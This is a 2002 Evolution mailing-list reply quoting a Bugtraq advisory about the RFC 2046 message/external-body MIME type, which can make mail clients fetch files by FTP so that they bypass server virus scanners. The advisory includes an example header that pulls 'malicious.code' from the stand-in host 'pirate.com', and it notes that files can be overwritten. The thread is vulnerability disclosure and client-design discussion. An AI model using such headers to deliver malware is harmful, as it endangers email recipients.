Speaking strictly client-side, what difference would this make over someone sending you malicious.code in the actual body of the message?
As far as I can tell, there's no difference. That said, I can't tell you if we will or will not implement this feature. Personally I'd like to do it eventually because I think it's kinda cool. Just because virus scanning software on the server is stupid doesn't mean you should limit functionality in the client, it just means you have to make server software less stupid. Either that or educate users. Besides, Evolution is a Unix client - I don't know of any virus that Evolution will auto-execute and will allow to root your system and do all sorts of nasty stuff. Evolution will never run a script or binary attachment. Ever. And afaik, we don't plan on making it so that messages can contain embedded scripts that Evolution will auto-magically run like Outlook does, so that's not an issue either. (We do plan to add scripting support to Evolution at some point, but we do not plan to make it so that messages can invoke commands). Jeff On Fri, 2002-09-27 at 11:48, Richard Bellavance wrote: > I hope support for this aberration will not be integrated into > Evolution... > > At least, 1.0.8 does not seem to support it. > > -- > Richard Bellavance COGNICASE inc. > Analyste-programmeur principal Hébergement, sécurité et réseaux > T.: 514-732-8000 #4153 20, Place du Commerce > F.: 514-732-8021 Verdun, Qc, H3E 1Z6, CANADA > > ______________________________________________________________________ > > From: Jose Marcio Martins da Cruz <[EMAIL PROTECTED]> > To: bugtraq <[EMAIL PROTECTED]> > Subject: Another possible RFC 2046 vulnerability. > Date: 27 Sep 2002 13:01:46 +0200 > > > Hi, > > Some days ago, we're talking about RFC 2046 message fragmentation > vulnerability. > > There is another related RFC 2046 vulnerability : message/external-body > message type. > > RFC 2046 message/external-body MIME type allows to send messages not by > it's content, but by reference. > > In this case, you can send a message with the following MIME tag : > > Content-Type: message/external-body; name="malicious.code"; > site="pirate.com"; mode="image"; > access-type=ANON-FTP; directory="pub" > > Client MUA, receives this and will get "malicious.code" file by > anonymous ftp from pirate.com ftp server. > > RFC 2046 defines five access-types :"FTP", "ANON-FTP", "TFTP", > "LOCAL-FILE", and "MAIL-SERVER". > > There are some other optional parameters to this feature. For example, > if the message includes parameter permission="write", existing file will > be overwriten. > > RFC 2046 says something about security in paragraph 5.2.3.6 : > > > (1) Accessing data via a "message/external-body" reference > > effectively results in the message recipient performing > > an operation that was specified by the message > > originator. It is therefore possible for the message > > originator to trick a recipient into doing something > > they would not have done otherwise. ... > > Combining different access-types (mainly anon-ftp, mail-server and > local-file) can create; IMHO, more complex attacks. > > What's interesting is that in this case the message and the malicious > code passes through two different network paths : messages is sent by > mail and the malicious code will be get by receiver by anonymous ftp. > > In the case of previous vulnerability (fragmented message), message and > malicious code uses the same network path. > > Classical mail server virus scanners will never see the malicious code > pass through it, as they will never have available entire malicious > code. > > The only way to detect it, IMHO, at mail server, is by lexical analysis > of MIME tags. > > Netscape Communicator 4.79 is compatible with this RFC 2046 feature. > > I can't say anything about others mail clients, as I'm sick at home and > I have no access to other MUAs. > > Attached to this message you'll find a message sent using this feature > and allowing you to get RFC 2046 by anonymous ftp. Maybe someone can > check it out with Outlook and other popular MUAs. It's in the /var/mail > format : you can append it to your mailbox and try it... 8-) > > References : RFC 2046 - MIME - Media Types > > Jose Marcio > > > -- > ------------------------------------------------------------------- > Jose Marcio MARTINS DA CRUZ > Ecole Nationale Superieure des Mines de Paris > Centre de Calcul Tel . : 01.40.51.93.41 > 60, bd Saint Michel http://www.ensmp.fr/~martins > 75272 - PARIS CEDEX 06 mailto:[EMAIL PROTECTED] > > ______________________________________________________________________ > > From [EMAIL PROTECTED] Wed Sep 18 10:40:02 2002 > Return-Path: <[EMAIL PROTECTED]> > Received: from didi.ensmp.fr (didi [10.5.5.101]) > by ticrobe.ensmp.fr (8.12.4/8.12.2/JMMC) with ESMTP id g8I8dLCi003339 > for <[EMAIL PROTECTED]>; Wed, 18 Sep 2002 10:40:02 +0200 > Sender: [EMAIL PROTECTED] > Message-ID: <[EMAIL PROTECTED]> > Date: Wed, 18 Sep 2002 10:29:14 +0200 > From: Jose Martins <[EMAIL PROTECTED]> > Reply-To: [EMAIL PROTECTED] > X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-3 i686) > X-Accept-Language: en > MIME-Version: 1.0 > To: [EMAIL PROTECTED] > Subject: tst attachment > Content-Type: multipart/mixed; > boundary="------------FA43411C8E35AC7F655DA077" > X-Miltered: at ticrobe by Joe's j-chkmail ("http://j-chkmail.ensmp.fr";)! > Status: RO > > This is a multi-part message in MIME format. > --------------FA43411C8E35AC7F655DA077 > Content-Type: text/plain; charset=us-ascii > Content-Transfer-Encoding: 7bit > > > RFC 2046 message/external-body compatibility test > > > --------------FA43411C8E35AC7F655DA077 > Content-Type: message/external-body; name="rfc2046.Z"; > site="ftp.inria.fr"; mode="image"; > access-type=ANON-FTP; directory="rfc/rfc20xx" > > > --------------FA43411C8E35AC7F655DA077-- -- Jeffrey Stedfast Evolution Hacker - Ximian, Inc. [EMAIL PROTECTED] - www.ximian.com _______________________________________________ evolution maillist - [EMAIL PROTECTED] http://lists.ximian.com/mailman/listinfo/evolution
